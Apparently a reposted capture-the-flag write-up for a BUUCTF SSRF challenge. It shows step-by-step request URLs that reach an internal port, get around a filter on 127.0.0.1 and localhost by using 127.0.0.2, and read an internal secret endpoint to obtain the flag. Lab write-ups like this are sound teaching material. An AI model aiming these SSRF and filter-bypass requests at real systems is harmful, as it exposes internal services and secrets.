Buuctf——[第三章 web进阶]Python里的SSRF
Posted 山川绿水
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Buuctf——[第三章 web进阶]Python里的SSRF相关的知识,希望对你有一定的参考价值。
[第三章 web进阶]Python里的SSRF
打开题目,题目让我们传入url,测试SSRF漏洞
http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://www.baidu.com
发现可以访问百度,根据题目提示说
我们就访问容器内部的8000端口
http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0.1:8000
但是127.0.0.1被过滤了,尝试了localhost
http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://localhost:8000
localhost同样被过滤了,尝试127.0.0.2
http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0.2:8000
发现可以被访问,那在继续加上路径即可
http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0.2:8000/api/internal/secret
得到flag
n1book{1132e28b5433c878}
以上是关于Buuctf——[第三章 web进阶]Python里的SSRF的主要内容,如果未能解决你的问题,请参考以下文章